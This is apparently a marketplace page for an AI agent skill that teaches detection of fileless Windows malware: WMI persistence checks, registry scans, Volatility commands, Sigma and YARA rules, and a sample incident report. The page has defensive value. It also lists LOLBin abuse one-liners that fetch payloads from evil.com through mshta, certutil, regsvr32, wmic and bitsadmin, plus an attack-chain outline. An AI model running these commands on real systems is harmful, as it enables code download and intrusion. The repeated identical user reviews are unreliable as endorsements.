Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination.
Works with
AI-first code editor with Composer
Before installing skills in Cursor, ensure your development environment meets these requirements:
node --versiondetecting-fileless-malware-techniquesExecute the skills CLI command in your project's root directory to begin installation:
Fetches detecting-fileless-malware-techniques from mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
The CLI shows a list of agents. Use arrow keys and space to select Cursor:
Confirm successful installation by checking the skill directory location:
Restart Cursor to activate detecting-fileless-malware-techniques. Access via /detecting-fileless-malware-techniques in your agent's command palette.
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Submit your Claude Code skill and start earning
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
0
total installs
0
this week
8.6K
GitHub stars
0
upvotes
Run in your terminal
0
installs
0
this week
8.6K
stars
| name | detecting-fileless-malware-techniques |
| description | 'Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination. ' |
| domain | cybersecurity |
| subdomain | malware-analysis |
| tags | - malware - fileless - LOLBins - memory-analysis - detection |
| version | 1.0.0 |
| author | mahipal |
| license | Apache-2.0 |
| d3fend_techniques | - Executable Denylisting - Execution Isolation - File Metadata Consistency Validation - Content Format Conversion - File Content Analysis |
| nist_csf | - DE.AE-02 - RS.AN-03 - ID.RA-01 - DE.CM-01 |
Do not use for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware.
Detect abuse of legitimate Windows binaries for malicious purposes:
Commonly Abused LOLBins and Detection Patterns:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
mshta.exe:
Abuse: Execute HTA files with embedded VBScript/JScript
Example: mshta http://evil.com/payload.hta
Example: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -enc ...""")
Detect: mshta.exe with URL argument or vbscript: prefix
regsvr32.exe:
Abuse: Load scriptlets via COM (.sct files) - "Squiblydoo"
Example: regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll
Detect: regsvr32.exe with /i: URL parameter
certutil.exe:
Abuse: Download files, decode Base64
Example: certutil -urlcache -split -f http://evil.com/payload.exe
Example: certutil -decode encoded.txt payload.exe
Detect: certutil.exe with -urlcache or -decode arguments
rundll32.exe:
Abuse: Execute DLL functions, JavaScript
Example: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";...
Detect: rundll32.exe with javascript: argument
wmic.exe:
Abuse: Execute code via XSL stylesheets
Example: wmic process get brief /format:"http://evil.com/payload.xsl"
Detect: wmic.exe with /format: URL parameter
bitsadmin.exe:
Abuse: Download files via BITS
Example: bitsadmin /transfer job http://evil.com/payload.exe C:\Temp\p.exe
Detect: bitsadmin.exe with /transfer or /addfile to external URL
cmstp.exe:
Abuse: Execute commands via INF file
Example: cmstp.exe /ni /s payload.inf
Detect: cmstp.exe execution from non-standard locations
Analyze WMI event subscriptions used for fileless persistence:
# List WMI event subscriptions (filters, consumers, bindings)
wmic /namespace:"\\root\subscription" path __EventFilter get Name,Query /format:list
wmic /namespace:"\\root\subscription" path CommandLineEventConsumer get Name,CommandLineTemplate /format:list
wmic /namespace:"\\root\subscription" path ActiveScriptEventConsumer get Name,ScriptText /format:list
wmic /namespace:"\\root\subscription" path __FilterToConsumerBinding get Filter,Consumer /format:list
# PowerShell enumeration of WMI subscriptions
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer
Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
# Parse Sysmon WMI events (Event IDs 19, 20, 21)
import subprocess
import xml.etree.ElementTree as ET
# WMI Event Filter creation (EID 19)
result = subprocess.run(
["wevtutil", "qe", "Microsoft-Windows-Sysmon/Operational",
"/q:*[System[EventID=19 or EventID=20 or EventID=21]]", "/f:xml", "/c:50"],
capture_output=True, text=True
)
ns = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
for event_xml in result.stdout.split("</Event>"):
if not event_xml.strip():
continue
try:
root = ET.fromstring(event_xml + "</Event>")
eid = root.find(".//e:System/e:EventID", ns).text
data = {}
for d in root.findall(".//e:EventData/e:Data", ns):
data[d.get("Name")] = d.text
if eid == "19":
print(f"[!] WMI Filter Created: {data.get('Name')}")
print(f" Query: {data.get('Query')}")
elif eid == "20":
print(f"[!] WMI Consumer Created: {data.get('Name')}")
print(f" Type: {data.get('Type')}")
print(f" Destination: {data.get('Destination')}")
elif eid == "21":
print(f"[!] WMI Binding Created")
print(f" Consumer: {data.get('Consumer')}")
print(f" Filter: {data.get('Filter')}")
except:
pass
Find malicious code stored in the Windows Registry:
# Common registry locations for fileless payloads
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /s
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /s
reg query "HKCU\Environment" /s
# Check for PowerShell encoded commands in registry values
# Malware stores Base64-encoded payloads in custom registry keys
reg query "HKCU\Software" /s /f "powershell" 2>nul
reg query "HKCU\Software" /s /f "-enc" 2>nul
# Check for large registry values (possible stored payloads)
python3 << 'PYEOF'
import winreg
import base64
suspicious_keys = [
(winreg.HKEY_CURRENT_USER, r"Software"),
(winreg.HKEY_LOCAL_MACHINE, r"Software"),
]
def scan_registry(hive, path, depth=0):
if depth > 3:
return
try:
key = winreg.OpenKey(hive, path)
i = 0
while True:
try:
name, value, vtype = winreg.EnumValue(key, i)
if isinstance(value, str) and len(value) > 500:
# Check for Base64-encoded content
try:
decoded = base64.b64decode(value[:100])
print(f"[!] Large Base64 value: {path}\\{name} ({len(value)} bytes)")
except:
pass
# Check for PowerShell keywords
if any(kw in value.lower() for kw in ["powershell", "invoke", "iex", "-enc"]):
print(f"[!] PowerShell in registry: {path}\\{name}")
i += 1
except WindowsError:
break
# Recurse into subkeys
j = 0
while True:
try:
subkey = winreg.EnumKey(key, j)
scan_registry(hive, f"{path}\\{subkey}", depth + 1)
j += 1
except WindowsError:
break
except:
pass
for hive, path in suspicious_keys:
scan_registry(hive, path)
PYEOF
Use memory forensics to find in-memory-only malware:
# Process with injected code (no backing file)
vol3 -f memory.dmp windows.malfind
# Check for .NET assemblies loaded from memory (not from disk files)
vol3 -f memory.dmp windows.vadinfo --pid 4012 | grep -i "PAGE_EXECUTE"
# PowerShell CLR usage (indicates .NET reflection loading)
vol3 -f memory.dmp windows.cmdline | grep -i "powershell"
# Scan for known fileless frameworks
vol3 -f memory.dmp yarascan.YaraScan --yara-rules "
rule Fileless_PowerShell {
strings:
\$s1 = \"System.Reflection.Assembly\" ascii wide
\$s2 = \"[System.Convert]::FromBase64String\" ascii wide
\$s3 = \"Invoke-Expression\" ascii wide
\$s4 = \"DownloadString\" ascii wide
condition:
2 of them
}
"
# Extract PowerShell command history from memory
vol3 -f memory.dmp windows.cmdline
strings memory.dmp | grep -i "invoke-\|iex \|downloadstring\|-encodedcommand"
Create detection content for fileless techniques:
# Sigma rule: LOLBin execution with network activity
title: Suspicious LOLBin Execution with Network Arguments
logsource:
category: process_creation
product: windows
detection:
selection_mshta:
Image|endswith: '\mshta.exe'
CommandLine|contains:
- 'http'
- 'vbscript:'
- 'javascript:'
selection_certutil:
Image|endswith: '\certutil.exe'
CommandLine|contains:
- '-urlcache'
- '-decode'
selection_regsvr32:
Image|endswith: '\regsvr32.exe'
CommandLine|contains: '/i:http'
selection_wmic:
Image|endswith: '\wmic.exe'
CommandLine|contains: '/format:http'
condition: selection_mshta or selection_certutil or selection_regsvr32 or selection_wmic
level: high
# Sigma rule: WMI persistence creation
title: WMI Event Subscription for Persistence
logsource:
product: windows
service: sysmon
detection:
selection:
EventID:
- 19 # WMI EventFilter
- 20 # WMI EventConsumer
- 21 # WMI FilterConsumerBinding
condition: selection
level: medium
Map the complete fileless attack lifecycle:
Typical Fileless Attack Chain:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Phase 1 - Initial Access:
Email -> Macro -> mshta.exe/PowerShell (LOLBin abuse)
OR Web exploit -> regsvr32/certutil (scriptlet download)
Phase 2 - Execution:
PowerShell downloads and executes script in memory
.NET Assembly.Load() for reflective loading
WMI process creation for lateral movement
Phase 3 - Persistence:
WMI event subscription (survives reboots)
Registry-stored encoded payload (loaded by Run key)
Scheduled task executing inline PowerShell
Phase 4 - Privilege Escalation:
PowerShell with Invoke-Mimikatz (in-memory credential theft)
Named pipe impersonation via WMI
Phase 5 - Lateral Movement:
WMI remote process creation (no file transfer needed)
PowerShell remoting (WinRM)
PsExec via WMI
Phase 6 - Exfiltration:
PowerShell HTTP POST to C2
DNS tunneling via Invoke-DNSExfiltration
Cloud storage API (OneDrive, Google Drive)
| Term | Definition |
|---|---|
| Fileless Malware | Malware operating entirely in memory or within legitimate system tools without creating traditional executable files on disk |
| LOLBins (Living Off the Land Binaries) | Legitimate system binaries (mshta, regsvr32, certutil) abused by attackers to execute malicious code while evading application whitelisting |
| WMI Event Subscription | Windows Management Instrumentation persistence mechanism using event filters, consumers, and bindings to execute code on system events |
| Registry-Resident Payload | Malicious code stored as encoded data in Windows Registry values, loaded and executed by a small stub in a Run key |
| Reflective Loading | Loading .NET assemblies or PE files from byte arrays in memory using Assembly.Load() without writing to disk |
| In-Memory Execution | Running code directly in RAM without creating files, leveraging process injection, reflective loading, or script interpreters |
| Script Block Logging | Windows PowerShell logging feature (Event ID 4104) that captures script content after deobfuscation, essential for fileless threat visibility |
Context: Sysmon alerts show WMI event subscription creation followed by periodic PowerShell execution without any corresponding malware files on disk. The attack persists across reboots.
Approach:
Pitfalls:
FILELESS MALWARE ANALYSIS REPORT
===================================
Incident: INC-2025-2847
Attack Type: Fileless (no malware files on disk)
INITIAL ACCESS
Vector: Phishing email with macro-enabled document
LOLBin Chain: WINWORD.EXE -> mshta.exe -> powershell.exe
PERSISTENCE MECHANISM
Type: WMI Event Subscription
Filter Name: WindowsUpdateCheck
Filter Query: SELECT * FROM __InstanceModificationEvent WITHIN 300
WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
Consumer: CommandLineEventConsumer
Command: powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4AdAA...
DECODED PAYLOAD
[Layer 1] Base64 UTF-16LE decode
[Layer 2] AMSI bypass + Assembly.Load() of embedded .NET payload
[Layer 3] .NET RAT with C2 communication to 185.220.101[.]42
REGISTRY PAYLOADS
HKCU\Software\AppDataLow\Config\data = [Base64 encoded .NET assembly, 247KB]
Loaded by: PowerShell WMI consumer script
MEMORY ARTIFACTS
PID 4012 (powershell.exe): Injected .NET assembly at 0x00400000
- CobaltStrike beacon detected via YARA
- C2: hxxps://185.220.101[.]42/updates
EXTRACTED IOCs
C2 IP: 185.220.101[.]42
WMI Filter: WindowsUpdateCheck
Registry Path: HKCU\Software\AppDataLow\Config\data
PowerShell Flags: -nop -w hidden -enc
MITRE ATT&CK
T1059.001 PowerShell
T1546.003 WMI Event Subscription
T1218.005 Mshta
T1112 Modify Registry
T1055.012 Process Hollowing
Prerequisites
Time Estimate
15-45 minutes depending on use case complexity
Steps
Common Pitfalls
✓ Do
✗ Don't
💡 Pro Tips
✓ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
detecting-fileless-malware-techniques fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
Useful defaults in detecting-fileless-malware-techniques — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
I recommend detecting-fileless-malware-techniques for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
detecting-fileless-malware-techniques has been reliable in day-to-day use. Documentation quality is above average for community skills.
detecting-fileless-malware-techniques fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
Useful defaults in detecting-fileless-malware-techniques — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
I recommend detecting-fileless-malware-techniques for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
detecting-fileless-malware-techniques has been reliable in day-to-day use. Documentation quality is above average for community skills.
Registry listing for detecting-fileless-malware-techniques matched our evaluation — installs cleanly and behaves as described in the markdown.
Solid pick for teams standardizing on skills: detecting-fileless-malware-techniques is focused, and the summary matches what you get after install.
showing 1-10 of 26